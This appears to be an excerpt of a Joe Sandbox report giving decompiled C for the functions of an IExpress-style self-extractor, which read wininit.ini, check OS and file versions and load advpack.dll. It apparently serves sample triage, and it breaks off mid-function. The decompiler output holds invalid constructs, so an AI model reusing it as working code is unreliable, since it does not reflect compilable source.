• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
• String ID: <None>$LICENSE
• API String ID: 2414642746-383193767
• Opcode ID: 90df8544ef0a2774e0f882f1ab59bf9a9a38a69f75b0f6ff62bc0005ba6e97d9
• Instruction ID: 342e8bf7596705ee4af682577f3c62914868131e463e1f2437f5dcaa3f51aad4
• Opcode Fuzzy Hash: 90df8544ef0a2774e0f882f1ab59bf9a9a38a69f75b0f6ff62bc0005ba6e97d9
• Instruction Fuzzy Hash: CF112970340201ABD734AF769C0DE5B3ABDDFE5710B50C53EB94ED69A1DB7988C0A620
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
E001724E0(void* __ebx) {
	signed int _v8;
	char _v268;
	void* __edi;
	void* __esi;
	signed int _t7;
	void* _t20;
	long _t25;
	long _t26;
	signed int _t27;

	_t20 = __ebx;
	_t7 =  *0x178004; // 0x4ffa21aa (global XORed with the frame pointer: the usual /GS stack-cookie pattern)
	_v8 = _t7 ^ _t27;
	_t25 = 0x104;
	_t26 = 0;
	// Build "<Windows directory>\wininit.ini" in the local MAX_PATH (0x104) buffer.
	if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
		E0017658A( &_v268, 0x104, "wininit.ini");
		// All-NULL section/key/value flushes the profile-file cache for that path.
		WritePrivateProfileStringA(0, 0, 0,  &_v268);
		_t25 = _lopen( &_v268, 0x40); // 0x40 = OF_SHARE_DENY_NONE
		if(_t25 != 0xffffffff) { // HFILE_ERROR
			// Seek to the end (origin 2 = FILE_END) to obtain the file size in _t26.
			_t26 = _llseek(_t25, 0, 2);
			_lclose(_t25);
		}
	}
	// Cookie check and epilogue; the size read above is passed through.
	return E00176CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
}

0x001724e0
0x001724eb
0x001724f2
0x001724f7
0x00172504
0x0017250e
0x0017251d
0x0017252c
0x00172541
0x00172546
0x00172553
0x00172555
0x00172555
0x00172546
0x0017256c

APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00172506
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0017252C
• _lopen.KERNEL32 ref: 0017253B
• _llseek.KERNEL32(00000000,00000000,00000002), ref: 0017254C
• _lclose.KERNEL32(00000000), ref: 00172555
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
• String ID: wininit.ini
• API String ID: 3273605193-4206010578
• Opcode ID: 06701e1b57096760dedfc1438191a9b414cba3dba1f105d54ed72922672b5aba
• Instruction ID: 93d9ad15f2237305226958f643193f1c4df11a11bb7f2e366bc577bfa143c07a
• Opcode Fuzzy Hash: 06701e1b57096760dedfc1438191a9b414cba3dba1f105d54ed72922672b5aba
• Instruction Fuzzy Hash: 91019E326001186BC7209B699C0CEDFBB7DEF85760F504555FA4DD3190DB748EC68AA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
E001736EE(CHAR* __ecx) {
	signed int _v8;
	char _v268;
	struct _OSVERSIONINFOA _v416;
	signed int _v420;
	signed int _v424;
	CHAR* _v428;
	CHAR* _v432;
	signed int _v436;
	CHAR* _v440;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t72;
	CHAR* _t77;
	CHAR* _t91;
	CHAR* _t94;
	int _t97;
	CHAR* _t98;
	signed char _t99;
	CHAR* _t104;
	signed short _t107;
	signed int _t109;
	short _t113;
	void* _t114;
	signed char _t115;
	short _t119;
	CHAR* _t123;
	CHAR* _t124;
	CHAR* _t129;
	signed int _t131;
	signed int _t132;
	CHAR* _t135;
	CHAR* _t138;
	signed int _t139;

	_t72 =  *0x178004; // 0x4ffa21aa
	_v8 = _t72 ^ _t139;
	_v416.dwOSVersionInfoSize = 0x94;
	_t115 = __ecx;
	_t135 = 0;
                                                                                                                                                                                                    				_v432 = __ecx;
                                                                                                                                                                                                    				_t138 = 0;
                                                                                                                                                                                                    				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                    					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                    					_t119 = 2;
                                                                                                                                                                                                    					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                    					__eflags = _t77;
                                                                                                                                                                                                    					if(_t77 == 0) {
                                                                                                                                                                                                    						_t119 = 0;
                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                    						 *0x178184 = 1;
                                                                                                                                                                                                    						 *0x178180 = 1;
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						 *0x179a40 = _t119;
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						__eflags =  *0x178a34 - _t138; // 0x0
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							goto L66;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t115;
                                                                                                                                                                                                    						if(_t115 == 0) {
                                                                                                                                                                                                    							goto L66;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v428 = _t135;
                                                                                                                                                                                                    						__eflags = _t119;
                                                                                                                                                                                                    						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                    						_t11 =  &_v420;
                                                                                                                                                                                                    						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                    						__eflags =  *_t11;
                                                                                                                                                                                                    						_v440 = _t115;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_v424 = _t135 * 0x18;
                                                                                                                                                                                                    							_v436 = E00172A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                    							_t91 = E00172A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                    							_t123 = _v436;
                                                                                                                                                                                                    							_t133 = 0x54d;
                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                    							if(_t123 < 0) {
                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                    								__eflags = _v420 - 1;
                                                                                                                                                                                                    								if(_v420 == 1) {
                                                                                                                                                                                                    									_t138 = 0x54c;
                                                                                                                                                                                                    									L36:
                                                                                                                                                                                                    									__eflags = _t138;
                                                                                                                                                                                                    									if(_t138 != 0) {
                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                    										__eflags = _t138 - _t133;
                                                                                                                                                                                                    										if(_t138 == _t133) {
                                                                                                                                                                                                    											L30:
                                                                                                                                                                                                    											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                    											_t115 = 0;
                                                                                                                                                                                                    											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                    											__eflags = _t138 - _t133;
                                                                                                                                                                                                    											_t133 = _v432;
                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                    												_t124 = _v440;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                    												_v420 =  &_v268;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t124;
                                                                                                                                                                                                    											if(_t124 == 0) {
                                                                                                                                                                                                    												_t135 = _v436;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t99 = _t124[0x30];
                                                                                                                                                                                                    												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                    												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                    												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                    													asm("sbb ebx, ebx");
                                                                                                                                                                                                    													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t115 = 0x104;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x178a38 & 0x00000001;
                                                                                                                                                                                                    											if(( *0x178a38 & 0x00000001) != 0) {
                                                                                                                                                                                                    												L64:
                                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                                    												_push(0x30);
                                                                                                                                                                                                    												_push(_v420);
                                                                                                                                                                                                    												_push("nst0dum");
                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												__eflags = _t135;
                                                                                                                                                                                                    												if(_t135 == 0) {
                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												__eflags =  *_t135;
                                                                                                                                                                                                    												if( *_t135 == 0) {
                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												MessageBeep(0);
                                                                                                                                                                                                    												_t94 = E0017681F(_t115);
                                                                                                                                                                                                    												__eflags = _t94;
                                                                                                                                                                                                    												if(_t94 == 0) {
                                                                                                                                                                                                    													L57:
                                                                                                                                                                                                    													0x180030 = 0x30;
                                                                                                                                                                                                    													L58:
                                                                                                                                                                                                    													_t97 = MessageBoxA(0, _t135, "nst0dum", 0x00180030 | _t115);
                                                                                                                                                                                                    													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                    													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                    														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                    														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                    															goto L66;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														__eflags = _t97 - 1;
                                                                                                                                                                                                    														L62:
                                                                                                                                                                                                    														if(__eflags == 0) {
                                                                                                                                                                                                    															_t138 = 0;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														goto L66;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													__eflags = _t97 - 6;
                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t98 = E001767C9(_t124, _t124);
                                                                                                                                                                                                    												__eflags = _t98;
                                                                                                                                                                                                    												if(_t98 == 0) {
                                                                                                                                                                                                    													goto L57;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                    										if(_t138 == 0x54c) {
                                                                                                                                                                                                    											goto L30;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t138;
                                                                                                                                                                                                    										if(_t138 == 0) {
                                                                                                                                                                                                    											goto L66;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t135 = 0;
                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                    										goto L44;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L37:
                                                                                                                                                                                                    									_t129 = _v432;
                                                                                                                                                                                                    									__eflags = _t129[0x7c];
                                                                                                                                                                                                    									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t133 =  &_v268;
                                                                                                                                                                                                    									_t104 = E001728E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                    									__eflags = _t104;
                                                                                                                                                                                                    									if(_t104 != 0) {
                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t135 = _v428;
                                                                                                                                                                                                    									_t133 = 0x54d;
                                                                                                                                                                                                    									_t138 = 0x54d;
                                                                                                                                                                                                    									goto L40;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							if(_t91 > 0) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                    							if(_t123 != 0) {
                                                                                                                                                                                                    								__eflags = _t91;
                                                                                                                                                                                                    								if(_t91 != 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                    								__eflags = _t135;
                                                                                                                                                                                                    								if(_t135 == 0) {
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t138 = 0x54c;
                                                                                                                                                                                                    								goto L30;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                    							if(_t91 != 0) {
                                                                                                                                                                                                    								_t131 = _v424;
                                                                                                                                                                                                    								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                    								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                    							_t109 = _v424;
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                    							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                    							L33:
                                                                                                                                                                                                    							_t135 =  &(_t135[1]);
                                                                                                                                                                                                    							_v428 = _t135;
                                                                                                                                                                                                    							_v420 = _t135;
                                                                                                                                                                                                    							__eflags = _t135 - 2;
                                                                                                                                                                                                    						} while (_t135 < 2);
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t77 == 1;
                                                                                                                                                                                                    					if(_t77 == 1) {
                                                                                                                                                                                                    						 *0x179a40 = _t119;
                                                                                                                                                                                                    						 *0x178184 = 1;
                                                                                                                                                                                                    						 *0x178180 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - 3;
                                                                                                                                                                                                    						if(_t133 > 3) {
                                                                                                                                                                                                    							__eflags = _t133 - 5;
                                                                                                                                                                                                    							if(_t133 < 5) {
                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t113 = 3;
                                                                                                                                                                                                    							_t119 = _t113;
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t119 = 1;
                                                                                                                                                                                                    						_t114 = 3;
                                                                                                                                                                                                    						 *0x179a40 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - _t114;
                                                                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							 *0x178184 = _t135;
                                                                                                                                                                                                    							 *0x178180 = _t135;
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                    						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t138 = 0x4ca;
                                                                                                                                                                                                    					goto L44;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t138 = 0x4b4;
                                                                                                                                                                                                    					L44:
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					L65:
                                                                                                                                                                                                    					_t133 = _t138;
                                                                                                                                                                                                    					E001744B9(0, _t138);
                                                                                                                                                                                                    					L66:
                                                                                                                                                                                                    					return E00176CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x001736f9
                                                                                                                                                                                                    0x00173700
                                                                                                                                                                                                    0x0017370c
                                                                                                                                                                                                    0x00173716
                                                                                                                                                                                                    0x00173718
                                                                                                                                                                                                    0x0017371b
                                                                                                                                                                                                    0x00173721
                                                                                                                                                                                                    0x0017372b
                                                                                                                                                                                                    0x0017373d
                                                                                                                                                                                                    0x00173745
                                                                                                                                                                                                    0x00173746
                                                                                                                                                                                                    0x00173746
                                                                                                                                                                                                    0x00173749
                                                                                                                                                                                                    0x001737ab
                                                                                                                                                                                                    0x001737ad
                                                                                                                                                                                                    0x001737ae
                                                                                                                                                                                                    0x001737b3
                                                                                                                                                                                                    0x001737b8
0x001737b8 0x001737bf 0x001737bf 0x001737c5 0x00000000 0x00000000 0x001737cb 0x001737cd
0x00000000 0x00000000 0x001737d5 0x001737db 0x001737e8 0x001737ea 0x001737ea 0x001737ea
0x001737f0 0x001737f6 0x00173805 0x00173817 0x0017382b 0x00173830 0x00173836 0x0017383b
0x0017383d 0x001738eb 0x001738eb 0x001738f2 0x0017390c 0x00173911 0x00173911 0x00173913
0x0017394d 0x0017394d 0x0017394f 0x001738a9 0x001738a9 0x001738b0 0x001738b2 0x001738b9
0x001738bb 0x001738c1 0x00173975 0x001738c7 0x001738de 0x001738e0 0x001738e0 0x0017397b
0x0017397d 0x001739a9 0x0017397f 0x00173982 0x0017398b 0x0017398d 0x0017398f 0x0017399f
0x001739a1 0x00173991 0x00173991 0x00173991 0x0017398f 0x001739af 0x001739b6 0x00173a0f
0x00173a0f 0x00173a11 0x00173a13 0x00173a19 0x00000000 0x001739b8 0x001739b8 0x001739ba
0x00000000 0x00000000 0x001739bc 0x001739bf 0x00000000 0x00000000 0x001739c3 0x001739c9
0x001739ce 0x001739d0 0x001739e3 0x001739e5 0x001739e6 0x001739f1 0x001739f7 0x001739fa
0x00173a01 0x00173a04 0x00000000 0x00000000 0x00173a06 0x00173a09 0x00173a09 0x00173a0b
0x00173a0b 0x00000000 0x00173a09 0x001739fc 0x00000000 0x001739fc 0x001739d3 0x001739d8
0x001739da 0x00000000 0x00000000 0x00000000 0x001739dc 0x001739b6 0x00173955 0x0017395b
0x00000000 0x00000000 0x00173961 0x00173963 0x00000000 0x00000000 0x00173969 0x00173969
0x00000000 0x00173969 0x00173915 0x00173915 0x0017391b 0x0017391f 0x00000000 0x00000000
0x0017392d 0x00173933 0x00173938 0x0017393a 0x00000000 0x00000000 0x00173940 0x00173946
0x0017394b 0x00000000 0x0017394b 0x00000000 0x001738f2 0x00173843 0x00173845 0x00000000
0x00000000 0x0017384b 0x0017384d 0x00173883 0x00173885 0x00000000 0x00000000 0x0017389a
0x0017389e 0x0017389e 0x00000000 0x00000000 0x001738a0 0x001738a0 0x001738a2 0x00000000
0x00000000 0x001738a4 0x00000000 0x001738a4 0x0017384f 0x00173851 0x00173857 0x0017386e
0x00173877 0x0017387b 0x00000000 0x00000000 0x00000000 0x00173881 0x00173859
                                                                                                                                                                                                    0x0017385c
                                                                                                                                                                                                    0x00173862
                                                                                                                                                                                                    0x00173866
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173868
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001738f4
                                                                                                                                                                                                    0x001738f4
                                                                                                                                                                                                    0x001738f5
                                                                                                                                                                                                    0x001738fb
                                                                                                                                                                                                    0x00173901
                                                                                                                                                                                                    0x00173901
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017390a
                                                                                                                                                                                                    0x0017374b
                                                                                                                                                                                                    0x0017374e
                                                                                                                                                                                                    0x0017375c
                                                                                                                                                                                                    0x00173764
                                                                                                                                                                                                    0x00173769
                                                                                                                                                                                                    0x0017376e
                                                                                                                                                                                                    0x00173771
                                                                                                                                                                                                    0x0017379c
                                                                                                                                                                                                    0x0017379f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001737a3
                                                                                                                                                                                                    0x001737a4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001737a4
                                                                                                                                                                                                    0x00173773
                                                                                                                                                                                                    0x00173777
                                                                                                                                                                                                    0x00173778
                                                                                                                                                                                                    0x0017377f
                                                                                                                                                                                                    0x00173781
                                                                                                                                                                                                    0x0017378e
                                                                                                                                                                                                    0x0017378e
                                                                                                                                                                                                    0x00173794
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173794
                                                                                                                                                                                                    0x00173783
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173785
                                                                                                                                                                                                    0x0017378c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017378c
                                                                                                                                                                                                    0x00173750
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017372d
                                                                                                                                                                                                    0x0017372d
                                                                                                                                                                                                    0x0017396b
                                                                                                                                                                                                    0x0017396b
                                                                                                                                                                                                    0x0017396c
                                                                                                                                                                                                    0x0017396e
                                                                                                                                                                                                    0x0017396f
                                                                                                                                                                                                    0x00173a1e
                                                                                                                                                                                                    0x00173a1e
                                                                                                                                                                                                    0x00173a22
                                                                                                                                                                                                    0x00173a27
                                                                                                                                                                                                    0x00173a3e
                                                                                                                                                                                                    0x00173a3e

APIs
• GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00173723
• MessageBeep.USER32(00000000), ref: 001739C3
• MessageBoxA.USER32(00000000,00000000,nst0dum,00000030), ref: 001739F1
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Message$BeepVersion
• String ID: 3$nst0dum
• API String ID: 2519184315-140149190
• Opcode ID: f0e086f86946674f7a497d195a9ecbf012efe3e6c8ae087425a24f0e04e6ee45
• Instruction ID: b67458759c6941da9fb81336371b3afc6f1b79adeee7e8c19a801e07e2ef974b
• Opcode Fuzzy Hash: f0e086f86946674f7a497d195a9ecbf012efe3e6c8ae087425a24f0e04e6ee45
• Instruction Fuzzy Hash: 7B91D4B1A412249FEB398F14CC81BAAB7B1AB85304F1581A9D9ADDB251D7708FC1EB41
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
E00176495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
	signed int _v8;
	char _v268;
	void* __edi;
	signed int _t9;
	signed char _t14;
	struct HINSTANCE__* _t15;
	void* _t18;
	CHAR* _t26;
	void* _t27;
	signed int _t28;

	_t27 = __esi;
	_t18 = __ebx;
	_t9 =  *0x178004; // 0x4ffa21aa  (stack-cookie seed, see security-cookie check at the end)
	_v8 = _t9 ^ _t28;
	_push(__ecx);
	// build "<extraction dir>\advpack.dll" in the local buffer _v268
	E00171781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
	_t26 = "advpack.dll";
	E0017658A( &_v268, 0x104, _t26);
	_t14 = GetFileAttributesA( &_v268);
	// if the full path does not exist (0xffffffff) or is a directory (0x10), fall back to
	// loading by bare name, i.e. the normal DLL search order; otherwise load from the
	// extraction directory with LOAD_WITH_ALTERED_SEARCH_PATH (8)
	if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
		_t15 = LoadLibraryA(_t26);
	} else {
		_t15 = LoadLibraryExA( &_v268, 0, 8);
	}
	return E00176CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
}

APIs
• GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 001764DF
• LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 001764F9
• LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00176502
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: LibraryLoad$AttributesFile
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
• API String ID: 438848745-258089097
• Opcode ID: 8285b38b930573bb2601259ec386b7bedd68de89d04f3cc267f1c8fd9046b109
• Instruction ID: 0ada24424b08d285367678ca8acddb41b0eb2e47a30121f21239b55fdb8734cb
• Opcode Fuzzy Hash: 8285b38b930573bb2601259ec386b7bedd68de89d04f3cc267f1c8fd9046b109
• Instruction Fuzzy Hash: D101F430A40108ABDB14EB74DC49EEE7778EFA4311F904195F58D925C0DF709ECACA51
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			/* Decompiler output (Joe Sandbox). Walks a table of 0x3c-byte entries hanging off the
			   object in __ecx (count at +0x7c, table base at +0x80), resolves the file named by
			   __edx against each entry via E00172773, reads that file's VS_FIXEDFILEINFO and
			   compares its version DWORDs with the bounds stored in the entry. Returns 1 when all
			   entries pass; the index of the entry being examined is written through _a8. */
			E001728E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00172773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						/* Size of the file's version resource; zero means no version info present. */
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							/* No version info: entry passes only if both of its bounds are zero. */
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									/* Query the root block "\\" to obtain the VS_FIXEDFILEINFO structure. */
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
